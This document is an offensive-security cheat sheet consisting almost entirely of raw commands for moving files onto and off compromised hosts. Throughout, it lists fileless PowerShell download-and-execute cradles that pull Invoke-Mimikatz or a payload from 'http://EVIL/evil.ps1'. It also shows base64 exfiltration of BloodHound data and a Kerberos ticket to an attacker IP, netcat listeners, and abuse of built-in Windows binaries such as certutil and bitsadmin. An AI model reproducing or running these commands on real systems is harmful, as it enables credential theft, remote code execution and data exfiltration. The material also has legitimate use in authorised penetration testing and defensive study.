$Client = New-Object -TypeName System.Net.WebClient
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
IEX (iwr 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
Invoke-WebRequest "http://10.10.10.10/mimikatz.exe" -OutFile "C:\Users\Public\mimikatz.exe"
Invoke-RestMethod "http://10.10.10.10/mimikatz.exe" -OutFile "C:\Users\Public\mimikatz.exe"
nc -lvnp 443
$Base64String = [System.convert]::ToBase64String((Get-Content -Path 'c:/temp/BloodHound.zip' -Encoding Byte))
Invoke-WebRequest -Uri http://10.10.10.10:443 -Method POST -Body $Base64String
echo <base64> | base64 -d -w 0 > bloodhound.zip
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\TEMP\admin.kirbi"))
[IO.File]::WriteAllBytes("admin.kirbi", [Convert]::FromBase64String("<base64>"))
from @harmj0y:
-
IEX (iwr 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1' -UseBasicParsing)
-
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
(New-Object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1", "C:\Users\Public\Invoke-Mimikatz.ps1")
-
hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
-
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
-
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
// DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1) // code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
from @subtee:
<#
<?xml version="1.0"?>
<command>
<a>
<execute>Get-Process</execute>
</a>
</command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex
Links:
https://gist.github.com/HarmJ0y/bb48307ffa663256e239
bitsadmin.exe /transfer n https://gist.githubusercontent.com/egre55/816ddb91016034dcf747f4ea5f054767/raw/69da838fdfd74811060aabfe1f66c8cd0d058daf/procmon.ps1 C:\Users\Public\Music\procmon.ps1
Links:
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
pscp.exe C:\Users\Public\info.txt user@target:/tmp/info.txt
pscp.exe user@target:/home/user/secret.txt C:\Users\Public\secret.txt
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1
Links:
https://twitter.com/subtee/status/888122309852016641?lang=en
certutil.exe -verifyctl -split -f https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1
Links:
https://twitter.com/egre55/status/1087685529016193025
cat binary | base64 -w 0
echo <base64> | base64 -d > binary
certutil.exe -encode mimikatz.exe mimikatz.txt
certutil.exe -decode mimikatz.txt mimikatz.exe
openssl.exe enc -base64 -in mimikatz.exe -out mimikatz.txt
openssl.exe enc -base64 -d -in mimikatz.txt -out mimikatz.exe
C:\Windows\System32\makecab.exe \\10.10.10.10\share\nmap.zip C:\Users\Public\nmap.cab
C:\Windows\System32\esentutl.exe /y "\\10.10.10.10\share\mimikatz_trunk.zip" /d"C:\Users\Public\mimikatz_trunk.zip" /o
C:\Windows\System32\extrac32.exe /Y /C \\10.10.10.10\share\secret.txt C:\Users\Public\secret.txt
C:\Windows\System32\print.exe /D c:\TEMP\ADExplorer.exe \\live.sysinternals.com\tools\ADExplorer.exe
Links:
https://twitter.com/Oddvarmoe/status/984749424395112448
for a more complete list of WebDAV downloaders check the LOLBINS/LOLBAS project created by @api0cradle: https://github.com/api0cradle/LOLBAS/blob/master/LOLBins.md
nc -nlvp 8000 > mimikatz.exe
nc -nv 10.10.10.10 8000 </tmp/mimikatz.exe
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/mimikatz.exe
openssl s_client -connect 10.10.10.10:80 -quiet > mimikatz.exe
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -run -ehttpd . -p80
php -S 0.0.0.0:80
socat TCP-LISTEN:80,reuseaddr,fork
wget http://10.10.10.10:80/info.txt -O /tmp/info.txt
cscript /nologo wget.js http://10.10.10.10/mimikatz.exe
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);
/* To save a binary file use this code instead of previous line
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("out.bin");
*/
Links:
cscript wget.vbs http://10.10.10.10/mimikatz.exe mimikatz.exe
Set args = WScript.Arguments
Url = args.Item(0)
File = args.Item(1)
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile File, 2 '//overwrite
end with
Links:
https://staheri.com/my-blog/2013/january/vbscript-download-file-from-url/
curl -o /tmp/info.txt http://10.10.10.10:80/info.txt
rdesktop 10.10.10.10 -r disk:linux='/home/user/rdesktop/files'
smbclient //10.10.10.10/share -U username -W domain
net use Q: \\10.10.10.10\share
xcopy \\10.10.10.10\share\mimikatz.exe mimikatz.exe
pushd \\10.10.10.10\share
mklink /D share \\10.10.10.10\share
ftp -s:script.txt
open 10.10.10.10
anonymous
anonymous
lcd c:\uploads
get info.txt
quit
Links:
https://www.jscape.com/blog/using-windows-ftp-scripts-to-automate-file-transfers
tftp -i 10.10.10.10 get mimikatz.exe
Compress file
upx -9 nc.exe
Disassemble
wine exe2bat.exe nc.exe nc.txt
Paste contents of nc.txt into a shell to create nc.exe
Links:
https://xapax.gitbooks.io/security/content/transfering_files_to_windows.html